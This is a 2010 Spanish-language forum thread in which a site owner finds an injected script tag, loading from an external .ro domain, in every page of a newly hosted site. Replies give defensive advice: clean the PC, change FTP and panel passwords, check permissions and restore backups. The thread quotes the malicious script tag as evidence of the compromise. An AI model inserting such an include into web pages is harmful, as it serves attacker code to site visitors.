Foros del Web » Administración de Sistemas » Cloud Computing »

Problema con software malintencionado

Estas en el tema de Problema con software malintencionado en el foro de Cloud Computing en Foros del Web. Hola... Hace poco contraté un servidor dedicado... y al estar todo OK y actualizarse los DNS, encuentro que en mis páginas al cargarlas había un ...
  #1 (permalink)  
Antiguo 15/08/2010, 18:50
 
Fecha de Ingreso: febrero-2008
Mensajes: 578
Antigüedad: 16 años, 2 meses
Puntos: 3
Problema con software malintencionado

Hola...

Hace poco contraté un servidor dedicado... y al estar todo OK y actualizarse los DNS, encuentro que en mis páginas al cargarlas había un script raro, entro a ver el código fuente y justo debajo de la etiqueta </head> de cada página aparece:

<script src=http://top-events.ro/using34/pci.php ></script>

Entonces me descargo las páginas del servidor para borrarles ese script, pero al editarlas no tienen ese código agregado.... pero cuando se visualizan por la web sí y me está causando que no aparezcan las imágenes, que se vea mal, que salten errores... que puede ser ??

Estoy un poco desesperado...
  #2 (permalink)  
Antiguo 15/08/2010, 20:43
Avatar de darkymen  
Fecha de Ingreso: julio-2008
Ubicación: Mexico
Mensajes: 48
Antigüedad: 15 años, 8 meses
Puntos: 0
Respuesta: Problema con software malintencionado

Hola Jamati,

Esto es super extraño, estas seguro que cuando bajas los archivos no esta el codigo? el problema aca es que tienes un malware en tu PC, limpia tu PC primero para estar seguros de esto.

Saludos.
  #3 (permalink)  
Antiguo 16/08/2010, 00:12
Avatar de mihosting  
Fecha de Ingreso: febrero-2006
Ubicación: Madrid
Mensajes: 68
Antigüedad: 18 años, 2 meses
Puntos: 1
Respuesta: Problema con software malintencionado

Si que es raro , si..., como dice darkymen, podria ser tu pc. para asegurarte de que no es asi, ves a otro y haz la prueba, si en otro las paginas estan normal, no hay duda es tu pc.

Si en otro pc pasa lo mismo, me extraña mucho que al bajarlas por ftp no tengan el codigo que mencionas.

Saludos
Miguel
__________________
Saludos

Miguel Herrero
www.miHosting.net

Última edición por WebTech; 16/08/2010 a las 07:14
  #4 (permalink)  
Antiguo 16/08/2010, 15:36
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 13 años, 8 meses
Puntos: 68
Respuesta: Problema con software malintencionado

Verifica que no tengas un spyware en tu PC, cambia el password de tus cuentas ftp y revisa los permisos de los archivos de tu servidor.
  #5 (permalink)  
Antiguo 18/08/2010, 16:30
 
Fecha de Ingreso: febrero-2008
Mensajes: 578
Antigüedad: 16 años, 2 meses
Puntos: 3
Respuesta: Problema con software malintencionado

Hola,

Gracias a todos, perdón pero me expliqué mal... el problema era que yo lo subí via FTP sin ningún código maligno, y a las pocas horas de estar en el nuevo servidor, ese código que mencioné en el primer posteo apareció en el código fuente de todas las páginas...

Al bajar dicho archivo del servidor a mi PC para analizarlo, obviamente lo seguía teniendo incrustado... un trabajo de chino fue eliminarlo nuevamente de todas las páginas.
  #6 (permalink)  
Antiguo 19/08/2010, 06:02
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 13 años, 8 meses
Puntos: 68
Respuesta: Problema con software malintencionado

Parece entonces que vulneraron tu password ftp, es muy habitual el robo de estos password por spyware, como te dije anteriormente, verifica que no tengas un spyware en tu PC, cambia el password de tus cuentas ftp.
  #7 (permalink)  
Antiguo 20/08/2010, 00:25
 
Fecha de Ingreso: mayo-2007
Ubicación: Peru
Mensajes: 588
Antigüedad: 16 años, 10 meses
Puntos: 12
Respuesta: Problema con software malintencionado

Por pasos.

1. El virus/troyano lo tienes en tu PC, el hecho de que tengas un antivirus no quiere decir que NO tengas virus/troyanos, es muy importante que uses un buen antivirus, y este debe ser original, usa además un antitroyano de confianza.

2. Cuando estés seguro que no hay ningún tipo de riesgo en tu pc, cambia la contraseña del panel de control de tu sitio, asi como los accesos FTP.

3. Si tienes antivirus en el servidor web usalo también, verifica los permisos, asi como archivos desconocidos.

4. Si tienes una copia de respaldo del sitio que esté libre de estos codigos vuelvela a subir, si es un script procura usar las ultimas versiones.

5. Una vez hecho esto en Herramientas para webmaster de google tienes que validad tu sitio y confirmar que ya liberaste del problema a tu sitio, y en unos dias debe desaparecer ese mensaje (si es el caso que google coloque un mensaje en su buscador).
__________________
Peru Server.NET - Hosting & Dominios
Reseller - VPS & Streaming de Audio
Diseño Joomla & WordPress

Etiquetas: software
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 06:08.